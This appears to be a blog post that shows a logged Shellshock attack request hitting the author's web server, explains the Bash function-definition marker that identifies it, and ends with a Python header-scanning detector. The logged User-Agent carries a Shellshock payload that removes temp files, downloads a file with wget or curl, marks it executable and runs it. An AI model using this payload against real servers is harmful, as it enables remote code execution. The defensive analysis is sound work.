What a Shellshock exploit attempt looks like

One of my HTTP servers hosted on Amazon EC2 regularly receives strange requests like these:

One such request looks like this:

    GET /cgi-bin/php5 HTTP/1.1
    Accept: /
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: () { :;};/usr/bin/perl -e ‘print “Content-Type: text/plainrnrnXSUCCESS!”;system(“cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget ; curl -O ; fetch ; lwp-download; chmod +x .c.txt* ; sh .c.txt* “);’
    Host:
    Connection: Close

The IP address in the screen shot is from Austria ( I received similar requests from the Netherlands, France and UK. Unfortunately, I configured the HTTP server to erase old logs, so I can’t say how many accesses I got and from which locations.

This is a variant of the Shellshock exploit discovered in September last year. How do you know that this is the Shellshock exploit? By seeing this text:

    User-Agent: () { :;};/usr/bin/perl -e

The Shellshock vulnerabilities affect Bash, a program that various Unix-based systems use to execute command lines and command scripts. It is often installed as the system’s default command-line interface. Bash is free software, developed collaboratively and overseen since 1992 on a volunteer basis by Chet Ramey, a professional software architect. Analysis of the…
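A log-side check for the marker described above, as an added example that is not part of the original post. It goes beyond the User-Agent case and inspects every request header, because CGI passes all of them to the script as environment variables; the function names and the sample requests are constructed for illustration.

```python
import re

# A header value that begins with a Bash function definition, "() {",
# is the Shellshock marker. Whitespace between the tokens is tolerated.
SHELLSHOCK_PREFIX = re.compile(r"^\s*\(\s*\)\s*\{")

def parse_headers(raw_request):
    """Return [(name, value), ...] for the header block of a raw HTTP request."""
    head = raw_request.replace("\r\n", "\n").split("\n\n", 1)[0]
    headers = []
    for line in head.split("\n")[1:]:          # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip(), value.strip()))
    return headers

def find_shellshock(raw_request):
    """Return [(header_name, trailing_command), ...] for suspicious headers."""
    hits = []
    for name, value in parse_headers(raw_request):
        if SHELLSHOCK_PREFIX.match(value):
            # Text after the function body's closing brace is what a
            # vulnerable Bash would execute while importing the variable.
            end = value.find("}")
            trailing = value[end + 1:].lstrip("; ") if end != -1 else ""
            hits.append((name, trailing))
    return hits

# Constructed sample requests (not taken from the post's logs).
PROBE_UA = ("GET /cgi-bin/php5 HTTP/1.1\r\n"
            "Accept-Language: en-us\r\n"
            "User-Agent: () { :;}; echo constructed-probe\r\n"
            "Connection: Close\r\n\r\n")
PROBE_COOKIE = ("GET /cgi-bin/status HTTP/1.1\r\n"
                "User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n"
                "Cookie: (){ :; }; echo constructed-probe-2\r\n\r\n")
BENIGN = ("GET /index.html HTTP/1.1\r\n"
          "User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n\r\n")

if __name__ == "__main__":
    for label, req in [("ua", PROBE_UA), ("cookie", PROBE_COOKIE), ("benign", BENIGN)]:
        print(label, find_shellshock(req))
```

The parenthesis in an ordinary browser User-Agent does not trigger the check, since the pattern requires the value to start with the `() {` sequence.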
